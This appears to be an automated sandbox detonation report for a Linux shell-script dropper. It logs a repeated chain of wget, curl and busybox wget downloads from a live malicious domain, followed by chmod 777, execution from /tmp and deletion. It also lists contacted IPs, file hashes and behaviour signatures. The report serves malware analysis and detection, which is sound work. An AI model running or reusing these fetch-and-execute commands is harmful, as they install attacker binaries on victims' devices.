[curl -O http://conn.masjesu.zip/bins/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa]

/bin/chmod

[chmod 777 BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa]

/tmp/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa

[./BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa]

/bin/rm

[rm BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN]

/bin/chmod

[chmod 777 tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN]

/tmp/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN

[./tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN]

/bin/rm

[rm tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4]

/bin/chmod

[chmod 777 idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4]

/tmp/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4

[./idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4]

/bin/rm

[rm idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8]

/bin/chmod

[chmod 777 4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8]

/tmp/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8

[./4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8]

/bin/rm

[rm 4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/DQul2qKd09ITKkHJpETty8DirCA07F1nBT]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/DQul2qKd09ITKkHJpETty8DirCA07F1nBT]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/DQul2qKd09ITKkHJpETty8DirCA07F1nBT]

/bin/chmod

[chmod 777 DQul2qKd09ITKkHJpETty8DirCA07F1nBT]

/tmp/DQul2qKd09ITKkHJpETty8DirCA07F1nBT

[./DQul2qKd09ITKkHJpETty8DirCA07F1nBT]

/bin/rm

[rm DQul2qKd09ITKkHJpETty8DirCA07F1nBT]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh]

/bin/chmod

[chmod 777 zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh]

/tmp/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh

[./zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh]

/bin/rm

[rm zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz]

/bin/chmod

[chmod 777 teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz]

/tmp/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz

[./teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz]

/bin/rm

[rm teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx]

/bin/chmod

[chmod 777 PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx]

/tmp/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx

[./PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx]

/bin/rm

[rm PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m]

/bin/chmod

[chmod 777 ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m]

/tmp/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m

[./ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m]

/bin/rm

[rm ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS]

/bin/chmod

[chmod 777 2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS]

/tmp/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS

[./2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS]

/bin/rm

[rm 2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp

Files

/tmp/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-20 03:24

Reported

2024-11-20 03:27

Platform

debian9-mipsel-20240611-en

Max time kernel

102s

Max time network

105s

Command Line

[/tmp/cae0f3aa5baf5db3fa86dff484e23996d5cf8abbf537303d56d7ef7b2003e5ca.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG /tmp/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG N/A
N/A /tmp/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx /tmp/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx N/A
N/A /tmp/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx /tmp/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx N/A
N/A /tmp/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa /tmp/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa N/A
N/A /tmp/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN /tmp/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN N/A
N/A /tmp/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4 /tmp/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4 N/A
N/A /tmp/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1 /tmp/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1 N/A
N/A /tmp/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8 /tmp/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8 N/A
N/A /tmp/DQul2qKd09ITKkHJpETty8DirCA07F1nBT /tmp/DQul2qKd09ITKkHJpETty8DirCA07F1nBT N/A
N/A /tmp/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz /tmp/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz N/A
N/A /tmp/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx /tmp/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx N/A
N/A /tmp/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m /tmp/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m N/A
N/A /tmp/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS /tmp/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS N/A
N/A /tmp/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh /tmp/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh N/A
N/A /tmp/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1 /tmp/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1 N/A
N/A /tmp/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG /tmp/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG N/A
N/A /tmp/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx /tmp/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx N/A
N/A /tmp/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx /tmp/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx N/A
N/A /tmp/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa /tmp/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa N/A
N/A /tmp/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN /tmp/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN N/A
N/A /tmp/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4 /tmp/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4 N/A
N/A /tmp/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8 /tmp/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8 N/A
N/A /tmp/DQul2qKd09ITKkHJpETty8DirCA07F1nBT /tmp/DQul2qKd09ITKkHJpETty8DirCA07F1nBT N/A
N/A /tmp/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh /tmp/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh N/A
N/A /tmp/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz /tmp/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz N/A
N/A /tmp/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx /tmp/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx N/A
N/A /tmp/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m /tmp/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m N/A
N/A /tmp/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS /tmp/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx /usr/bin/curl N/A
File opened for modification /tmp/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1 /usr/bin/curl N/A
File opened for modification /tmp/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8 /usr/bin/curl N/A
File opened for modification /tmp/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG /usr/bin/curl N/A
File opened for modification /tmp/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS /usr/bin/curl N/A
File opened for modification /tmp/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh /usr/bin/curl N/A
File opened for modification /tmp/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx /usr/bin/curl N/A
File opened for modification /tmp/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh /usr/bin/curl N/A
File opened for modification /tmp/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa /usr/bin/curl N/A
File opened for modification /tmp/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1 /usr/bin/curl N/A
File opened for modification /tmp/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx /usr/bin/curl N/A
File opened for modification /tmp/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx /usr/bin/curl N/A
File opened for modification /tmp/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8 /usr/bin/curl N/A
File opened for modification /tmp/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4 /usr/bin/curl N/A
File opened for modification /tmp/DQul2qKd09ITKkHJpETty8DirCA07F1nBT /usr/bin/curl N/A
File opened for modification /tmp/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN /usr/bin/curl N/A
File opened for modification /tmp/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS /usr/bin/curl N/A
File opened for modification /tmp/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx /usr/bin/curl N/A
File opened for modification /tmp/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN /usr/bin/curl N/A
File opened for modification /tmp/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa /usr/bin/curl N/A
File opened for modification /tmp/DQul2qKd09ITKkHJpETty8DirCA07F1nBT /usr/bin/curl N/A
File opened for modification /tmp/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m /usr/bin/curl N/A
File opened for modification /tmp/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG /usr/bin/curl N/A
File opened for modification /tmp/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m /usr/bin/curl N/A
File opened for modification /tmp/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz /usr/bin/curl N/A
File opened for modification /tmp/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4 /usr/bin/curl N/A
File opened for modification /tmp/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz /usr/bin/curl N/A
File opened for modification /tmp/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx /usr/bin/curl N/A

Processes

/tmp/cae0f3aa5baf5db3fa86dff484e23996d5cf8abbf537303d56d7ef7b2003e5ca.sh

